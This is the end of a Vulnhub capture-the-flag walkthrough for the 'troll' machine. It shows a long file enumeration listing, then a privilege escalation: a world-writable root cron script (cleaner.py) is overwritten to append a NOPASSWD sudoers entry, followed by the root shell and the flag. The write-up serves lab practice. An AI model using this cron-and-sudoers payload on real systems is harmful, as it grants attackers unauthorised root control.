/proc/363/task/364/attr/fscreate
/proc/363/task/364/attr/keycreate
/proc/363/task/364/attr/sockcreate
/proc/363/task/365/attr/current
/proc/363/task/365/attr/exec
/proc/363/task/365/attr/fscreate
/proc/363/task/365/attr/keycreate
/proc/363/task/365/attr/sockcreate
/proc/363/task/366/attr/current
/proc/363/task/366/attr/exec
/proc/363/task/366/attr/fscreate
/proc/363/task/366/attr/keycreate
/proc/363/task/366/attr/sockcreate
/proc/363/attr/current
/proc/363/attr/exec
/proc/363/attr/fscreate
/proc/363/attr/keycreate
/proc/363/attr/sockcreate
/proc/396/task/396/attr/current
/proc/396/task/396/attr/exec
/proc/396/task/396/attr/fscreate
/proc/396/task/396/attr/keycreate
/proc/396/task/396/attr/sockcreate
/proc/396/attr/current
/proc/396/attr/exec
/proc/396/attr/fscreate
/proc/396/attr/keycreate
/proc/396/attr/sockcreate
/proc/596/task/596/attr/current
/proc/596/task/596/attr/exec
/proc/596/task/596/attr/fscreate
/proc/596/task/596/attr/keycreate
/proc/596/task/596/attr/sockcreate
/proc/596/attr/current
/proc/596/attr/exec
/proc/596/attr/fscreate
/proc/596/attr/keycreate
/proc/596/attr/sockcreate
/proc/612/task/612/attr/current
/proc/612/task/612/attr/exec
/proc/612/task/612/attr/fscreate
/proc/612/task/612/attr/keycreate
/proc/612/task/612/attr/sockcreate
/proc/612/attr/current
/proc/612/attr/exec
/proc/612/attr/fscreate
/proc/612/attr/keycreate
/proc/612/attr/sockcreate
/proc/657/task/657/attr/current
/proc/657/task/657/attr/exec
/proc/657/task/657/attr/fscreate
/proc/657/task/657/attr/keycreate
/proc/657/task/657/attr/sockcreate
/proc/657/attr/current
/proc/657/attr/exec
/proc/657/attr/fscreate
/proc/657/attr/keycreate
/proc/657/attr/sockcreate
/proc/751/task/751/attr/current
/proc/751/task/751/attr/exec
/proc/751/task/751/attr/fscreate
/proc/751/task/751/attr/keycreate
/proc/751/task/751/attr/sockcreate
/proc/751/attr/current
/proc/751/attr/exec
/proc/751/attr/fscreate
/proc/751/attr/keycreate
/proc/751/attr/sockcreate
/proc/754/task/754/attr/current
/proc/754/task/754/attr/exec
/proc/754/task/754/attr/fscreate
/proc/754/task/754/attr/keycreate
/proc/754/task/754/attr/sockcreate
/proc/754/attr/current
/proc/754/attr/exec
/proc/754/attr/fscreate
/proc/754/attr/keycreate
/proc/754/attr/sockcreate
/proc/757/task/757/attr/current
/proc/757/task/757/attr/exec
/proc/757/task/757/attr/fscreate
/proc/757/task/757/attr/keycreate
/proc/757/task/757/attr/sockcreate
/proc/757/attr/current
/proc/757/attr/exec
/proc/757/attr/fscreate
/proc/757/attr/keycreate
/proc/757/attr/sockcreate
/proc/758/task/758/attr/current
/proc/758/task/758/attr/exec
/proc/758/task/758/attr/fscreate
/proc/758/task/758/attr/keycreate
/proc/758/task/758/attr/sockcreate
/proc/758/attr/current
/proc/758/attr/exec
/proc/758/attr/fscreate
/proc/758/attr/keycreate
/proc/758/attr/sockcreate
/proc/760/task/760/attr/current
/proc/760/task/760/attr/exec
/proc/760/task/760/attr/fscreate
/proc/760/task/760/attr/keycreate
/proc/760/task/760/attr/sockcreate
/proc/760/attr/current
/proc/760/attr/exec
/proc/760/attr/fscreate
/proc/760/attr/keycreate
/proc/760/attr/sockcreate
/proc/789/task/789/attr/current
/proc/789/task/789/attr/exec
/proc/789/task/789/attr/fscreate
/proc/789/task/789/attr/keycreate
/proc/789/task/789/attr/sockcreate
/proc/789/attr/current
/proc/789/attr/exec
/proc/789/attr/fscreate
/proc/789/attr/keycreate
/proc/789/attr/sockcreate
/proc/794/task/794/attr/current
/proc/794/task/794/attr/exec
/proc/794/task/794/attr/fscreate
/proc/794/task/794/attr/keycreate
/proc/794/task/794/attr/sockcreate
/proc/794/attr/current
/proc/794/attr/exec
/proc/794/attr/fscreate
/proc/794/attr/keycreate
/proc/794/attr/sockcreate
/proc/1081/task/1081/attr/current
/proc/1081/task/1081/attr/exec
/proc/1081/task/1081/attr/fscreate
/proc/1081/task/1081/attr/keycreate
/proc/1081/task/1081/attr/sockcreate
/proc/1081/attr/current
/proc/1081/attr/exec
/proc/1081/attr/fscreate
/proc/1081/attr/keycreate
/proc/1081/attr/sockcreate
/proc/1106/task/1106/attr/current
/proc/1106/task/1106/attr/exec
/proc/1106/task/1106/attr/fscreate
/proc/1106/task/1106/attr/keycreate
/proc/1106/task/1106/attr/sockcreate
/proc/1106/attr/current
/proc/1106/attr/exec
/proc/1106/attr/fscreate
/proc/1106/attr/keycreate
/proc/1106/attr/sockcreate
/proc/1129/task/1129/attr/current
/proc/1129/task/1129/attr/exec
/proc/1129/task/1129/attr/fscreate
/proc/1129/task/1129/attr/keycreate
/proc/1129/task/1129/attr/sockcreate
/proc/1129/task/1159/attr/current
/proc/1129/task/1159/attr/exec
/proc/1129/task/1159/attr/fscreate
/proc/1129/task/1159/attr/keycreate
/proc/1129/task/1159/attr/sockcreate
/proc/1129/task/1160/attr/current
/proc/1129/task/1160/attr/exec
/proc/1129/task/1160/attr/fscreate
/proc/1129/task/1160/attr/keycreate
/proc/1129/task/1160/attr/sockcreate
/proc/1129/task/1161/attr/current
/proc/1129/task/1161/attr/exec
/proc/1129/task/1161/attr/fscreate
/proc/1129/task/1161/attr/keycreate
/proc/1129/task/1161/attr/sockcreate
/proc/1129/task/1162/attr/current
/proc/1129/task/1162/attr/exec
/proc/1129/task/1162/attr/fscreate
/proc/1129/task/1162/attr/keycreate
/proc/1129/task/1162/attr/sockcreate
/proc/1129/task/1163/attr/current
/proc/1129/task/1163/attr/exec
/proc/1129/task/1163/attr/fscreate
/proc/1129/task/1163/attr/keycreate
/proc/1129/task/1163/attr/sockcreate
/proc/1129/task/1164/attr/current
/proc/1129/task/1164/attr/exec
/proc/1129/task/1164/attr/fscreate
/proc/1129/task/1164/attr/keycreate
/proc/1129/task/1164/attr/sockcreate
/proc/1129/task/1165/attr/current
/proc/1129/task/1165/attr/exec
/proc/1129/task/1165/attr/fscreate
/proc/1129/task/1165/attr/keycreate
/proc/1129/task/1165/attr/sockcreate
/proc/1129/task/1166/attr/current
/proc/1129/task/1166/attr/exec
/proc/1129/task/1166/attr/fscreate
/proc/1129/task/1166/attr/keycreate
/proc/1129/task/1166/attr/sockcreate
/proc/1129/task/1167/attr/current
/proc/1129/task/1167/attr/exec
/proc/1129/task/1167/attr/fscreate
/proc/1129/task/1167/attr/keycreate
/proc/1129/task/1167/attr/sockcreate
/proc/1129/task/1168/attr/current
/proc/1129/task/1168/attr/exec
/proc/1129/task/1168/attr/fscreate
/proc/1129/task/1168/attr/keycreate
/proc/1129/task/1168/attr/sockcreate
/proc/1129/task/1169/attr/current
/proc/1129/task/1169/attr/exec
/proc/1129/task/1169/attr/fscreate
/proc/1129/task/1169/attr/keycreate
/proc/1129/task/1169/attr/sockcreate
/proc/1129/task/1170/attr/current
/proc/1129/task/1170/attr/exec
/proc/1129/task/1170/attr/fscreate
/proc/1129/task/1170/attr/keycreate
/proc/1129/task/1170/attr/sockcreate
/proc/1129/task/1171/attr/current
/proc/1129/task/1171/attr/exec
/proc/1129/task/1171/attr/fscreate
/proc/1129/task/1171/attr/keycreate
/proc/1129/task/1171/attr/sockcreate
/proc/1129/task/1172/attr/current
/proc/1129/task/1172/attr/exec
/proc/1129/task/1172/attr/fscreate
/proc/1129/task/1172/attr/keycreate
/proc/1129/task/1172/attr/sockcreate
/proc/1129/task/1173/attr/current
/proc/1129/task/1173/attr/exec
/proc/1129/task/1173/attr/fscreate
/proc/1129/task/1173/attr/keycreate
/proc/1129/task/1173/attr/sockcreate
/proc/1129/task/1174/attr/current
/proc/1129/task/1174/attr/exec
/proc/1129/task/1174/attr/fscreate
/proc/1129/task/1174/attr/keycreate
/proc/1129/task/1174/attr/sockcreate
/proc/1129/task/1175/attr/current
/proc/1129/task/1175/attr/exec
/proc/1129/task/1175/attr/fscreate
/proc/1129/task/1175/attr/keycreate
/proc/1129/task/1175/attr/sockcreate
/proc/1129/task/1176/attr/current
/proc/1129/task/1176/attr/exec
/proc/1129/task/1176/attr/fscreate
/proc/1129/task/1176/attr/keycreate
/proc/1129/task/1176/attr/sockcreate
/proc/1129/task/1177/attr/current
/proc/1129/task/1177/attr/exec
/proc/1129/task/1177/attr/fscreate
/proc/1129/task/1177/attr/keycreate
/proc/1129/task/1177/attr/sockcreate
/proc/1129/task/1178/attr/current
/proc/1129/task/1178/attr/exec
/proc/1129/task/1178/attr/fscreate
/proc/1129/task/1178/attr/keycreate
/proc/1129/task/1178/attr/sockcreate
/proc/1129/task/1179/attr/current
/proc/1129/task/1179/attr/exec
/proc/1129/task/1179/attr/fscreate
/proc/1129/task/1179/attr/keycreate
/proc/1129/task/1179/attr/sockcreate
/proc/1129/task/1180/attr/current
/proc/1129/task/1180/attr/exec
/proc/1129/task/1180/attr/fscreate
/proc/1129/task/1180/attr/keycreate
/proc/1129/task/1180/attr/sockcreate
/proc/1129/task/1181/attr/current
/proc/1129/task/1181/attr/exec
/proc/1129/task/1181/attr/fscreate
/proc/1129/task/1181/attr/keycreate
/proc/1129/task/1181/attr/sockcreate
/proc/1129/task/1182/attr/current
/proc/1129/task/1182/attr/exec
/proc/1129/task/1182/attr/fscreate
/proc/1129/task/1182/attr/keycreate
/proc/1129/task/1182/attr/sockcreate
/proc/1129/task/1183/attr/current
/proc/1129/task/1183/attr/exec
/proc/1129/task/1183/attr/fscreate
/proc/1129/task/1183/attr/keycreate
/proc/1129/task/1183/attr/sockcreate
/proc/1129/task/1184/attr/current
/proc/1129/task/1184/attr/exec
/proc/1129/task/1184/attr/fscreate
/proc/1129/task/1184/attr/keycreate
/proc/1129/task/1184/attr/sockcreate
/proc/1129/attr/current
/proc/1129/attr/exec
/proc/1129/attr/fscreate
/proc/1129/attr/keycreate
/proc/1129/attr/sockcreate
/proc/1130/task/1130/attr/current
/proc/1130/task/1130/attr/exec
/proc/1130/task/1130/attr/fscreate
/proc/1130/task/1130/attr/keycreate
/proc/1130/task/1130/attr/sockcreate
/proc/1130/task/1133/attr/current
/proc/1130/task/1133/attr/exec
/proc/1130/task/1133/attr/fscreate
/proc/1130/task/1133/attr/keycreate
/proc/1130/task/1133/attr/sockcreate
/proc/1130/task/1134/attr/current
/proc/1130/task/1134/attr/exec
/proc/1130/task/1134/attr/fscreate
/proc/1130/task/1134/attr/keycreate
/proc/1130/task/1134/attr/sockcreate
/proc/1130/task/1135/attr/current
/proc/1130/task/1135/attr/exec
/proc/1130/task/1135/attr/fscreate
/proc/1130/task/1135/attr/keycreate
/proc/1130/task/1135/attr/sockcreate
/proc/1130/task/1136/attr/current
/proc/1130/task/1136/attr/exec
/proc/1130/task/1136/attr/fscreate
/proc/1130/task/1136/attr/keycreate
/proc/1130/task/1136/attr/sockcreate
/proc/1130/task/1137/attr/current
/proc/1130/task/1137/attr/exec
/proc/1130/task/1137/attr/fscreate
/proc/1130/task/1137/attr/keycreate
/proc/1130/task/1137/attr/sockcreate
/proc/1130/task/1138/attr/current
/proc/1130/task/1138/attr/exec
/proc/1130/task/1138/attr/fscreate
/proc/1130/task/1138/attr/keycreate
/proc/1130/task/1138/attr/sockcreate
/proc/1130/task/1139/attr/current
/proc/1130/task/1139/attr/exec
/proc/1130/task/1139/attr/fscreate
/proc/1130/task/1139/attr/keycreate
/proc/1130/task/1139/attr/sockcreate
/proc/1130/task/1140/attr/current
/proc/1130/task/1140/attr/exec
/proc/1130/task/1140/attr/fscreate
/proc/1130/task/1140/attr/keycreate
/proc/1130/task/1140/attr/sockcreate
/proc/1130/task/1141/attr/current
/proc/1130/task/1141/attr/exec
/proc/1130/task/1141/attr/fscreate
/proc/1130/task/1141/attr/keycreate
/proc/1130/task/1141/attr/sockcreate
/proc/1130/task/1142/attr/current
/proc/1130/task/1142/attr/exec
/proc/1130/task/1142/attr/fscreate
/proc/1130/task/1142/attr/keycreate
/proc/1130/task/1142/attr/sockcreate
/proc/1130/task/1143/attr/current
/proc/1130/task/1143/attr/exec
/proc/1130/task/1143/attr/fscreate
/proc/1130/task/1143/attr/keycreate
/proc/1130/task/1143/attr/sockcreate
/proc/1130/task/1144/attr/current
/proc/1130/task/1144/attr/exec
/proc/1130/task/1144/attr/fscreate
/proc/1130/task/1144/attr/keycreate
/proc/1130/task/1144/attr/sockcreate
/proc/1130/task/1145/attr/current
/proc/1130/task/1145/attr/exec
/proc/1130/task/1145/attr/fscreate
/proc/1130/task/1145/attr/keycreate
/proc/1130/task/1145/attr/sockcreate
/proc/1130/task/1146/attr/current
/proc/1130/task/1146/attr/exec
/proc/1130/task/1146/attr/fscreate
/proc/1130/task/1146/attr/keycreate
/proc/1130/task/1146/attr/sockcreate
/proc/1130/task/1147/attr/current
/proc/1130/task/1147/attr/exec
/proc/1130/task/1147/attr/fscreate
/proc/1130/task/1147/attr/keycreate
/proc/1130/task/1147/attr/sockcreate
/proc/1130/task/1148/attr/current
/proc/1130/task/1148/attr/exec
/proc/1130/task/1148/attr/fscreate
/proc/1130/task/1148/attr/keycreate
/proc/1130/task/1148/attr/sockcreate
/proc/1130/task/1149/attr/current
/proc/1130/task/1149/attr/exec
/proc/1130/task/1149/attr/fscreate
/proc/1130/task/1149/attr/keycreate
/proc/1130/task/1149/attr/sockcreate
/proc/1130/task/1150/attr/current
/proc/1130/task/1150/attr/exec
/proc/1130/task/1150/attr/fscreate
/proc/1130/task/1150/attr/keycreate
/proc/1130/task/1150/attr/sockcreate
/proc/1130/task/1151/attr/current
/proc/1130/task/1151/attr/exec
/proc/1130/task/1151/attr/fscreate
/proc/1130/task/1151/attr/keycreate
/proc/1130/task/1151/attr/sockcreate
/proc/1130/task/1152/attr/current
/proc/1130/task/1152/attr/exec
/proc/1130/task/1152/attr/fscreate
/proc/1130/task/1152/attr/keycreate
/proc/1130/task/1152/attr/sockcreate
/proc/1130/task/1153/attr/current
/proc/1130/task/1153/attr/exec
/proc/1130/task/1153/attr/fscreate
/proc/1130/task/1153/attr/keycreate
/proc/1130/task/1153/attr/sockcreate
/proc/1130/task/1154/attr/current
/proc/1130/task/1154/attr/exec
/proc/1130/task/1154/attr/fscreate
/proc/1130/task/1154/attr/keycreate
/proc/1130/task/1154/attr/sockcreate
/proc/1130/task/1155/attr/current
/proc/1130/task/1155/attr/exec
/proc/1130/task/1155/attr/fscreate
/proc/1130/task/1155/attr/keycreate
/proc/1130/task/1155/attr/sockcreate
/proc/1130/task/1156/attr/current
/proc/1130/task/1156/attr/exec
/proc/1130/task/1156/attr/fscreate
/proc/1130/task/1156/attr/keycreate
/proc/1130/task/1156/attr/sockcreate
/proc/1130/task/1157/attr/current
/proc/1130/task/1157/attr/exec
/proc/1130/task/1157/attr/fscreate
/proc/1130/task/1157/attr/keycreate
/proc/1130/task/1157/attr/sockcreate
/proc/1130/task/1158/attr/current
/proc/1130/task/1158/attr/exec
/proc/1130/task/1158/attr/fscreate
/proc/1130/task/1158/attr/keycreate
/proc/1130/task/1158/attr/sockcreate
/proc/1130/attr/current
/proc/1130/attr/exec
/proc/1130/attr/fscreate
/proc/1130/attr/keycreate
/proc/1130/attr/sockcreate
/proc/1205/task/1205/attr/current
/proc/1205/task/1205/attr/exec
/proc/1205/task/1205/attr/fscreate
/proc/1205/task/1205/attr/keycreate
/proc/1205/task/1205/attr/sockcreate
/proc/1205/task/1217/attr/current
/proc/1205/task/1217/attr/exec
/proc/1205/task/1217/attr/fscreate
/proc/1205/task/1217/attr/keycreate
/proc/1205/task/1217/attr/sockcreate
/proc/1205/task/1218/attr/current
/proc/1205/task/1218/attr/exec
/proc/1205/task/1218/attr/fscreate
/proc/1205/task/1218/attr/keycreate
/proc/1205/task/1218/attr/sockcreate
/proc/1205/attr/current
/proc/1205/attr/exec
/proc/1205/attr/fscreate
/proc/1205/attr/keycreate
/proc/1205/attr/sockcreate
/proc/1259/task/1259/attr/current
/proc/1259/task/1259/attr/exec
/proc/1259/task/1259/attr/fscreate
/proc/1259/task/1259/attr/keycreate
/proc/1259/task/1259/attr/sockcreate
/proc/1259/attr/current
/proc/1259/attr/exec
/proc/1259/attr/fscreate
/proc/1259/attr/keycreate
/proc/1259/attr/sockcreate
/proc/1707/task/1707/attr/current
/proc/1707/task/1707/attr/exec
/proc/1707/task/1707/attr/fscreate
/proc/1707/task/1707/attr/keycreate
/proc/1707/task/1707/attr/sockcreate
/proc/1707/attr/current
/proc/1707/attr/exec
/proc/1707/attr/fscreate
/proc/1707/attr/keycreate
/proc/1707/attr/sockcreate
/proc/1725/task/1725/attr/current
/proc/1725/task/1725/attr/exec
/proc/1725/task/1725/attr/fscreate
/proc/1725/task/1725/attr/keycreate
/proc/1725/task/1725/attr/sockcreate
/proc/1725/attr/current
/proc/1725/attr/exec
/proc/1725/attr/fscreate
/proc/1725/attr/keycreate
/proc/1725/attr/sockcreate
/proc/1726/task/1726/fd/0
/proc/1726/task/1726/fd/1
/proc/1726/task/1726/fd/2
/proc/1726/task/1726/fd/10
/proc/1726/task/1726/fd/11
/proc/1726/task/1726/sched
/proc/1726/task/1726/comm
/proc/1726/task/1726/mem
/proc/1726/task/1726/clear_refs
/proc/1726/task/1726/attr/current
/proc/1726/task/1726/attr/exec
/proc/1726/task/1726/attr/fscreate
/proc/1726/task/1726/attr/keycreate
/proc/1726/task/1726/attr/sockcreate
/proc/1726/task/1726/oom_adj
/proc/1726/task/1726/oom_score_adj
/proc/1726/task/1726/loginuid
/proc/1726/task/1726/uid_map
/proc/1726/task/1726/gid_map
/proc/1726/task/1726/projid_map
/proc/1726/fd/0
/proc/1726/fd/1
/proc/1726/fd/2
/proc/1726/fd/10
/proc/1726/fd/11
/proc/1726/sched
/proc/1726/autogroup
/proc/1726/comm
/proc/1726/mem
/proc/1726/clear_refs
/proc/1726/attr/current
/proc/1726/attr/exec
/proc/1726/attr/fscreate
/proc/1726/attr/keycreate
/proc/1726/attr/sockcreate
/proc/1726/oom_adj
/proc/1726/oom_score_adj
/proc/1726/loginuid
/proc/1726/coredump_filter
/proc/1726/uid_map
/proc/1726/gid_map
/proc/1726/projid_map
/proc/1734/task/1734/fd
/proc/1734/task/1734/fd/0
/proc/1734/task/1734/fd/1
/proc/1734/task/1734/fd/2
/proc/1734/task/1734/sched
/proc/1734/task/1734/comm
/proc/1734/task/1734/mem
/proc/1734/task/1734/clear_refs
/proc/1734/task/1734/attr/current
/proc/1734/task/1734/attr/exec
/proc/1734/task/1734/attr/fscreate
/proc/1734/task/1734/attr/keycreate
/proc/1734/task/1734/attr/sockcreate
/proc/1734/task/1734/oom_adj
/proc/1734/task/1734/oom_score_adj
/proc/1734/task/1734/loginuid
/proc/1734/task/1734/uid_map
/proc/1734/task/1734/gid_map
/proc/1734/task/1734/projid_map
/proc/1734/fd
/proc/1734/fd/0
/proc/1734/fd/1
/proc/1734/fd/2
/proc/1734/map_files
/proc/1734/sched
/proc/1734/autogroup
/proc/1734/comm
/proc/1734/mem
/proc/1734/clear_refs
/proc/1734/attr/current
/proc/1734/attr/exec
/proc/1734/attr/fscreate
/proc/1734/attr/keycreate
/proc/1734/attr/sockcreate
/proc/1734/oom_adj
/proc/1734/oom_score_adj
/proc/1734/loginuid
/proc/1734/coredump_filter
/proc/1734/uid_map
/proc/1734/gid_map
/proc/1734/projid_map
/dev/log
/dev/shm
/dev/char/5:0
/dev/char/5:2
/dev/char/10:200
/dev/char/10:229
/dev/char/1:5
/dev/char/1:9
/dev/char/1:8
/dev/char/1:3
/dev/char/1:7
/dev/stderr
/dev/stdout
/dev/stdin
/dev/fd
/dev/pts/0
/dev/net/tun
/dev/ptmx
/dev/fuse
/dev/tty
/dev/urandom
/dev/random
/dev/full
/dev/zero
/dev/null
/lib/log/cleaner.py

发现以root权限执行的定时任务cleaner.py,所有用户都具有RWX权限

权限提升

修改cleaner.py文件内容,尝试为overflow用户添加sudo权限

#!/usr/bin/env python
import os
try:
os.system('echo "overflow ALL=(ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers')
except:
pass

等待定时任务执行,并重新登录

ssh overflow@192.168.65.136
overflow@192.168.65.136's password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation:  https://help.ubuntu.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Jan 22 19:05:42 2024 from 192.168.65.128
Could not chdir to home directory /home/overflow: No such file or directory
$ sudo su - root
sudo: unable to resolve host troll
root@troll:~#

提权成功

flag

root@troll:~# cd /root/
root@troll:~# ls
proof.txt
root@troll:~# cat proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
root@troll:~#
pacpVulnhubWeb
暂无评论

发送评论 编辑评论 



























































































|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	




颜文字
Emoji
小恐龙
花!
	


									














上一篇
下一篇